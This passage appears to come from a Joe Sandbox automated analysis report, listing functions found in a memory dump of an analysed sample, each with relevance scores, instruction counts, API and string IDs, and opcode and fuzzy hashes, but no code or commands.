                                                                                                                                                                    • API String ID: 0-1255102257
                                                                                                                                                                    • Opcode ID: 444531a9e9d6de0a23d2cf825c2c02117726caac540634e9fa92b1395273db5f
                                                                                                                                                                    • Instruction ID: 88f52dc626e3553bade033757b2d428ea1bfd2dfa0e2d97bbcfdcb5fb9851849
                                                                                                                                                                    • Opcode Fuzzy Hash: 444531a9e9d6de0a23d2cf825c2c02117726caac540634e9fa92b1395273db5f
                                                                                                                                                                    • Instruction Fuzzy Hash: FA41DF746046918FDB158F25D4A0672BBE1EF97358729848EC0C69B753CB399807CBA8
                                                                                                                                                                    Function 0042BED5 Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ptBu
                                                                                                                                                                    • API String ID: 0-4221769528
                                                                                                                                                                    • Opcode ID: 420dd60d1444e5e7852c0f347a47c84510b9fc7941039308dad69c1143b0d6dc
                                                                                                                                                                    • Instruction ID: c138e8db1dfbc5701062052a0f37211ae36591ed7cbaa1d9e3076125472ea853
                                                                                                                                                                    • Opcode Fuzzy Hash: 420dd60d1444e5e7852c0f347a47c84510b9fc7941039308dad69c1143b0d6dc
                                                                                                                                                                    • Instruction Fuzzy Hash: 039116B06047528FD716CF29D0A0766FBE1BF57300F28819EC4DA8B752C739A846CB94
                                                                                                                                                                    Function 00427F39 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: $
                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                    • Opcode ID: 30ee26642945b348eed24224988a5b6c0b4b7ed93ed305719871e7488145e72e
                                                                                                                                                                    • Instruction ID: a726412e75d917fc6d5b6ea03f94b32ec0921681666c5b61af8630c96cbb957d
                                                                                                                                                                    • Opcode Fuzzy Hash: 30ee26642945b348eed24224988a5b6c0b4b7ed93ed305719871e7488145e72e
                                                                                                                                                                    • Instruction Fuzzy Hash: B3A166B69083509FC320DF24D84166FB7E1EFD2304F09893EE5955B352EA39E805CB8A
                                                                                                                                                                    Function 004090A0 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: {
                                                                                                                                                                    • API String ID: 0-366298937
                                                                                                                                                                    • Opcode ID: 4d91d576a596ede954f1abddab5f265abb145e5bfa7b12ee0cd7d41707fe8d16
                                                                                                                                                                    • Instruction ID: cd6e171ae638edb2aa2aadc1d95dbbb17b5d2586a7cfd8864c1caeb2ccff934b
                                                                                                                                                                    • Opcode Fuzzy Hash: 4d91d576a596ede954f1abddab5f265abb145e5bfa7b12ee0cd7d41707fe8d16
                                                                                                                                                                    • Instruction Fuzzy Hash: F071D36060C3858FD305CE2984A076BBFE1AF97301F0889BDE4D59B386D6798D0AC766
                                                                                                                                                                    Function 0043C980 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID: @
                                                                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                                                                    • Opcode ID: 31b8634babcd73501289142ddd2b83b22676fdf7223c856deabbe579146c6484
                                                                                                                                                                    • Instruction ID: ed9861d180ddf529acc8b0ce082a53df043cfa1399054261649451575e1f9c7d
                                                                                                                                                                    • Opcode Fuzzy Hash: 31b8634babcd73501289142ddd2b83b22676fdf7223c856deabbe579146c6484
                                                                                                                                                                    • Instruction Fuzzy Hash: 8F3164725083088FC314EF94DCC866FB7E5EBC9310F05993DEA8997391E73998489796
                                                                                                                                                                    Function 0041AC69 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: >
                                                                                                                                                                    • API String ID: 0-325317158
                                                                                                                                                                    • Opcode ID: f692c9b346749b832776912492db2ec2b6bbaa13d2c3928a9aaf16eea73d84e5
                                                                                                                                                                    • Instruction ID: 72ffc954c5a75874b646eb390d9e65fd734d6d110dfad6019bfdc9158c99ef10
                                                                                                                                                                    • Opcode Fuzzy Hash: f692c9b346749b832776912492db2ec2b6bbaa13d2c3928a9aaf16eea73d84e5
                                                                                                                                                                    • Instruction Fuzzy Hash: B2217D318493918FD315CF25984126BBBE29BD2314F088A2DF4D1A7392D639C907CB97
                                                                                                                                                                    Function 0041A951 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: HDJ+
                                                                                                                                                                    • API String ID: 0-2925384733
                                                                                                                                                                    • Opcode ID: 8e6451a09ac81abad7dc6ebc77afccc77425753aa553fa6cb2ee2eef2219b886
                                                                                                                                                                    • Instruction ID: e5621f01ed5ca240ae72ee065287fd3420eca4d8398eccc5a2797727be0da41d
                                                                                                                                                                    • Opcode Fuzzy Hash: 8e6451a09ac81abad7dc6ebc77afccc77425753aa553fa6cb2ee2eef2219b886
                                                                                                                                                                    • Instruction Fuzzy Hash: 9A11973890A3909AD3118A2990507B7FFE18F93354F18949FF4D19B392D238C886CB9B
                                                                                                                                                                    Function 00414486 Relevance: .9, Instructions: 901COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: eedbc573f0a6e05b36066a368daa7067e443e55e2841faa42befb57fbf87c100
                                                                                                                                                                    • Instruction ID: cd79e90251fd10c05869fae088a33c4b93fa5b390f036ce57858fbdc49722184
                                                                                                                                                                    • Opcode Fuzzy Hash: eedbc573f0a6e05b36066a368daa7067e443e55e2841faa42befb57fbf87c100
                                                                                                                                                                    • Instruction Fuzzy Hash: 444251BAE40110DFCB288F54EC40BBE73B2EB8A715F19812DE945A7395DB395C01CB98
                                                                                                                                                                    Function 00402F00 Relevance: .7, Instructions: 687COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d34d3f29df3e5ddb155ec1cf723753776ad238508d42524458d56e5cd52fc11a
                                                                                                                                                                    • Instruction ID: 6f5b49b59f734ff4ae360bd3fe08ba6e6963712f3571b0a73b295e2304c0f4c0
                                                                                                                                                                    • Opcode Fuzzy Hash: d34d3f29df3e5ddb155ec1cf723753776ad238508d42524458d56e5cd52fc11a
                                                                                                                                                                    • Instruction Fuzzy Hash: 145205716083459FCB14CF28C4906AAFBE1BF89305F18897EF89967381D778E945CB89
                                                                                                                                                                    Function 00413DE2 Relevance: .7, Instructions: 658COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 48ed5e1f4f3b807e3656553c6cf256810d55518e95a675d2aaa572c4fbfa0015
                                                                                                                                                                    • Instruction ID: 2beea08e8f4b2f9c44276ff57c7b5a9458684d77f8a9dc1b5fb50ebf3f0061d4
                                                                                                                                                                    • Opcode Fuzzy Hash: 48ed5e1f4f3b807e3656553c6cf256810d55518e95a675d2aaa572c4fbfa0015
                                                                                                                                                                    • Instruction Fuzzy Hash: 850205B2E002158BDB14CF68C8927EBB7F1EF5A310F194069EC85AB391E3799D81C795
                                                                                                                                                                    Function 0043C0A0 Relevance: .6, Instructions: 638COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c1780ea1a72ac7c4ed1ae8cba3c04fefe656e8b1d8ce7d34feb59910ff8156e9
                                                                                                                                                                    • Instruction ID: bab2e67e3e96969620708ba52279bd114ed330fb0f5efaa2df7688b03f088f4e
                                                                                                                                                                    • Opcode Fuzzy Hash: c1780ea1a72ac7c4ed1ae8cba3c04fefe656e8b1d8ce7d34feb59910ff8156e9
                                                                                                                                                                    • Instruction Fuzzy Hash: B412F23A618211CFC708DF28E8D166AB7E1FB8E315F1A887EE58587391D734D845CB86
                                                                                                                                                                    Function 00407450 Relevance: .6, Instructions: 634COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d94395d1d21f4634844847a8cedfe468290310b3421f90656b1f3195f54f77f7
                                                                                                                                                                    • Instruction ID: 3cae87f066e1e6e6886db27b97f4e4ac774ff9de2259b17d526dc86e33009402
                                                                                                                                                                    • Opcode Fuzzy Hash: d94395d1d21f4634844847a8cedfe468290310b3421f90656b1f3195f54f77f7
                                                                                                                                                                    • Instruction Fuzzy Hash: 5922C272A087119BD724DF18D8846ABB3E1EFC4315F19893ED986A7381D738B851CB87
                                                                                                                                                                    Function 0043C1A0 Relevance: .5, Instructions: 532COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f2e84d6063765931f8c2bcfeae30b23b9fd07be31373d1add271e0be7a43a5f0
                                                                                                                                                                    • Instruction ID: 1346ca051b8f3ae05f6cd9f12d1c96c8ea2cb78061a88a7b92e753f243555ae1
                                                                                                                                                                    • Opcode Fuzzy Hash: f2e84d6063765931f8c2bcfeae30b23b9fd07be31373d1add271e0be7a43a5f0
                                                                                                                                                                    • Instruction Fuzzy Hash: 10F1F039718211CFC708CF28E89066AB7E2FB8A314F1A897EE59587391D735D845CB46
                                                                                                                                                                    Function 0043C1BB Relevance: .5, Instructions: 521COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7d65c6177d3f11c1236b2d1de3e2188621574274234b2536812bfcf978a680cc
                                                                                                                                                                    • Instruction ID: 0e7167b407682e9e5ab36eddea359f6eea5b5d501de5e00f730aba32e4d40cae
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d65c6177d3f11c1236b2d1de3e2188621574274234b2536812bfcf978a680cc
                                                                                                                                                                    • Instruction Fuzzy Hash: EEF10039718211CFC708CF28E8D066AB7E2FB8A314F1A897EE59587391D739D845CB46
                                                                                                                                                                    Function 0043C1B9 Relevance: .5, Instructions: 520COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 79e39bb27fd57b3f60fd1b44574b9ee5bf4cf9033f8996213be872d9c748f81f
                                                                                                                                                                    • Instruction ID: decbaec90041712f550677ea8d945c0106860918588fe3583585983a0f3182b3
                                                                                                                                                                    • Opcode Fuzzy Hash: 79e39bb27fd57b3f60fd1b44574b9ee5bf4cf9033f8996213be872d9c748f81f
                                                                                                                                                                    • Instruction Fuzzy Hash: 7BF10039718211CFC708CF28E8D066AB7E2FB8A314F1A897EE59587391D738D845CB46
                                                                                                                                                                    Function 00436BA0 Relevance: .5, Instructions: 517COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: a5d8fbb9587121add138898b6a7e5118c1d5839a93e6dd6d552b7ceec20ae692
                                                                                                                                                                    • Instruction ID: eca95be113115f17ca6e95483d8c2770677e9b79baf950b464ba56cdffcfe084
                                                                                                                                                                    • Opcode Fuzzy Hash: a5d8fbb9587121add138898b6a7e5118c1d5839a93e6dd6d552b7ceec20ae692
                                                                                                                                                                    • Instruction Fuzzy Hash: 0AD177B56083019FC324CF24DC8162BB7E2EBC9718F16A52EE9C587351D7399C05C79A
                                                                                                                                                                    Function 00415E22 Relevance: .3, Instructions: 330COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b09e2ce0127631831920e15759b5eda36398dc3afd1802b9f3a6e59462166b1c
                                                                                                                                                                    • Instruction ID: 44486692b0116ea2576c3962e0ca59c335ee207b67aafded0410a17457c81d80
                                                                                                                                                                    • Opcode Fuzzy Hash: b09e2ce0127631831920e15759b5eda36398dc3afd1802b9f3a6e59462166b1c
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B91C274204B40CFD725CF29D8906A7BBE2FB9A701F54846DD4DA8B796CB39E842CB14
                                                                                                                                                                    Function 0043D150 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: 19c17a7254da745241b7cf82dc610a312384aef46553aa7cc42f82a4de8d887c
                                                                                                                                                                    • Instruction ID: d7e0a3c4e39d8f5867896841547065041c691a27e7aa5d21db2c2fbe6f74e8c4
                                                                                                                                                                    • Opcode Fuzzy Hash: 19c17a7254da745241b7cf82dc610a312384aef46553aa7cc42f82a4de8d887c
                                                                                                                                                                    • Instruction Fuzzy Hash: D6A13431B083118FC7248F68E88066BB3E2EF98710F05953DED8697351DB39AC51C796
                                                                                                                                                                    Function 00426751 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7c73f4c95d51c6cda944f15e56322803fe35696758a813c97df91ac7ce30c19e
                                                                                                                                                                    • Instruction ID: 2ea93ce4085ce4fced07fc153a0242db4f38a11fd1d259fce15408463a6b3ad1
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c73f4c95d51c6cda944f15e56322803fe35696758a813c97df91ac7ce30c19e
                                                                                                                                                                    • Instruction Fuzzy Hash: A5A12576A00611CFDB14CF65EC4136EB7B2FBC9314F5A453DD886A7394DB78A8028B89
                                                                                                                                                                    Function 0043CDF0 Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: c9e5b6ba303298866f1d83aa284411713aa1a00ccb69f9ce716f3d20969e8ae5
                                                                                                                                                                    • Instruction ID: bb52b08561b053b3b60a98453c1ea72ca1cf418b318c3f84e0d580f64f830ef0
                                                                                                                                                                    • Opcode Fuzzy Hash: c9e5b6ba303298866f1d83aa284411713aa1a00ccb69f9ce716f3d20969e8ae5
                                                                                                                                                                    • Instruction Fuzzy Hash: 5291E336A083019FD7149F18D890A2BB3F2EFC9B14F1A952DE885AB351DB35DC52C786
                                                                                                                                                                    Function 00421440 Relevance: .3, Instructions: 298COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 55ce32c750ef0cc3fbd684bc11e9d186197f3662fdf23b99a505db0a5e745683
                                                                                                                                                                    • Instruction ID: 4b0a94f8f4ab219a0e118b3c6352d93906a14ade8fc8c532c64973732c5f5217
                                                                                                                                                                    • Opcode Fuzzy Hash: 55ce32c750ef0cc3fbd684bc11e9d186197f3662fdf23b99a505db0a5e745683
                                                                                                                                                                    • Instruction Fuzzy Hash: B28114B1604311ABC720DF14DC81B6B77B0EFD1758F48482DE9868B3A1E379E909C76A
                                                                                                                                                                    Function 0043CAD0 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: 4afcf7a625bbbea73c679db668116586ce67147efb45dc3f6fa679b03fa6aed8
                                                                                                                                                                    • Instruction ID: bf16f2f6ce44ddd74e1d44e8765b90081ca933525a91ab78435fddcf8c0a7c79
                                                                                                                                                                    • Opcode Fuzzy Hash: 4afcf7a625bbbea73c679db668116586ce67147efb45dc3f6fa679b03fa6aed8
                                                                                                                                                                    • Instruction Fuzzy Hash: 4E815C36A043149BD720AF18DC9166BB7A2EFC9710F0AD53DEC896B351EB38AC51C785
                                                                                                                                                                    Function 00438EB0 Relevance: .3, Instructions: 269COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: 26fdec510c5f24e0b0f863b9bd84d89b5af787f3b2983c5f7cb28577f9f76eb2
                                                                                                                                                                    • Instruction ID: ea51a2f480b5396187e6ee67b7f938f70bfd8b529b49f0b83a4bbfcca61f5e4a
                                                                                                                                                                    • Opcode Fuzzy Hash: 26fdec510c5f24e0b0f863b9bd84d89b5af787f3b2983c5f7cb28577f9f76eb2
                                                                                                                                                                    • Instruction Fuzzy Hash: 3C717873F043104FE7249E25DC8072BF6E3ABD9B14F1E852DD889A7355DA79AC01878A
                                                                                                                                                                    Function 00421C00 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a6e832e78a54abbdb54a3a7bec85ddd8321fb36da15bee22445486291825dc48
                                                                                                                                                                    • Instruction ID: e922d9fee0493bcbe28598090298c0fb96ffa6e6295199aa557820145953a066
                                                                                                                                                                    • Opcode Fuzzy Hash: a6e832e78a54abbdb54a3a7bec85ddd8321fb36da15bee22445486291825dc48
                                                                                                                                                                    • Instruction Fuzzy Hash: F75128A56502208BC7149F15EC92B7773B4EFA2374F49455AE8828B3A1F73CE904C7A5
                                                                                                                                                                    Function 004291C3 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4b27377063a1dcb35115b70c9622d04bb35c58c5fb7e262b5004f6f936003cdf
                                                                                                                                                                    • Instruction ID: 6b43cfcb4cfd3446b687511eb50b28b7ecb47c89a7a04df23d4dda8b6d92f375
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b27377063a1dcb35115b70c9622d04bb35c58c5fb7e262b5004f6f936003cdf
                                                                                                                                                                    • Instruction Fuzzy Hash: C971FFB1A102669FEB54CF29DC02BAABFB0FB45320F5542ACD555AF392C7748842CBC5
                                                                                                                                                                    Function 0040E35C Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                    • Opcode ID: d49e0ee9d1f3322b70a772370ed519fae5aeb205f927f71957cb379c6f5a4035
                                                                                                                                                                    • Instruction ID: 0649716271abe2f53c5fc7c7f4cda49f0e0f40f1dc930eea410b2d0626a89825
                                                                                                                                                                    • Opcode Fuzzy Hash: d49e0ee9d1f3322b70a772370ed519fae5aeb205f927f71957cb379c6f5a4035
                                                                                                                                                                    • Instruction Fuzzy Hash: 1941D5346192009FD7188B25D59093FB7E2EB97B14F64993DD88663391C63ADC138B8E
                                                                                                                                                                    Function 00417984 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 227c581fdcd6e26d2fae43994bf120bdb8fc194b86a2872c4e62d65689474a73
